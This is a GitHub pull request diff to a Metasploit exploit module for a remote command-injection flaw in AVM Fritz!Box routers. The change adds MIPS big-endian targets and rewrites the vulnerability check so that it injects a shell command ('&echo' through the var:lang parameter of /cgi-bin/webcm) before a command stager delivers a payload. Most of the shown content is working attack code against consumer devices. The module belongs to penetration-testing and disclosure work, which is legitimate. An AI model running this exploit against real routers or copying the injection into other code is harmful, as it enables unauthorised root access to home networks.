Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fritz!Box exploit: Added Big Endianess, improved check()-Function #3207

Merged
merged 1 commit into from Apr 10, 2014
Merged

Fritz!Box exploit: Added Big Endianess, improved check()-Function #3207

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
45 changes: 29 additions & 16 deletions modules/exploits/linux/http/fritzbox_echo_exec.rb
View file
Open in desktop
Expand Up @@ -24,51 +24,64 @@ def initialize(info = {})
'Author' =>
[
'unknown', # Vulnerability discovery
'Fabian Braeunlein <fabian@breaking.systems>', #Metasploit PoC with wget method
'Fabian Braeunlein <fabian@breaking.systems>', # Metasploit PoC with wget method
'Michael Messner <devnull@s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '103289' ],
[ 'BID', '65520' ],
[ 'URL', 'http://www.kapple.de/?p=75' ], #vulnerability details with PoC
[ 'URL', 'https://www.speckmarschall.de/hoere.htm' ], #probably the first published details (now censored)
[ 'URL', 'http://pastebin.com/GnMKGmZ2' ], #published details uncensored from speckmarschall
[ 'URL', 'http://www.avm.de/en/Sicherheit/update_list.html' ], #vendor site with a list of vulnerable devices
[ 'URL', 'http://breaking.systems/blog/2014/04/avm-fritzbox-root-rce-from-patch-to-metasploit-module-ii' ] #wirteup with PoC
[ 'URL', 'http://www.kapple.de/?p=75' ], # vulnerability details with PoC
[ 'URL', 'https://www.speckmarschall.de/hoere.htm' ], # probably the first published details (now censored)
[ 'URL', 'http://pastebin.com/GnMKGmZ2' ], # published details uncensored from speckmarschall
[ 'URL', 'http://www.avm.de/en/Sicherheit/update_list.html' ], # vendor site with a list of vulnerable devices
[ 'URL', 'http://breaking.systems/blog/2014/04/avm-fritzbox-root-rce-from-patch-to-metasploit-module-ii' ] # writeup with PoC
],
'DisclosureDate' => 'Feb 11 2014',
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'Automatic Targeting', { } ],
[ 'MIPS Little Endian',
{
'Arch' => ARCH_MIPSLE,
}
],
[ 'MIPS Big Endian',
{
'Arch' => ARCH_MIPS,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0
))
end

def check
begin
clue = Rex::Text::rand_text_alpha(rand(5) + 5)

res = send_request_cgi({
'uri' => '/cgi-bin/webcm',
'method' => 'GET'
'method' => 'GET',
'vars_get' => {
"var:lang" => "&echo -e \"\\n\\n#{clue}\""
}
})

if res && [200, 301, 302].include?(res.code)
return Exploit::CheckCode::Detected
if res && res.body =~ /#{clue}/
return Exploit::CheckCode::Vulnerable
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
return Exploit::CheckCode::Safe
end

Exploit::CheckCode::Unknown
Exploit::CheckCode::Safe
end

def execute_command(cmd, opts)
Expand All @@ -89,14 +102,14 @@ def execute_command(cmd, opts)
def exploit
print_status("#{peer} - Trying to access the vulnerable URL...")

unless check == Exploit::CheckCode::Detected
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
end

print_status("#{peer} - Exploiting...")

execute_cmdstager(
:linemax => 90
:linemax => 92
)
end
end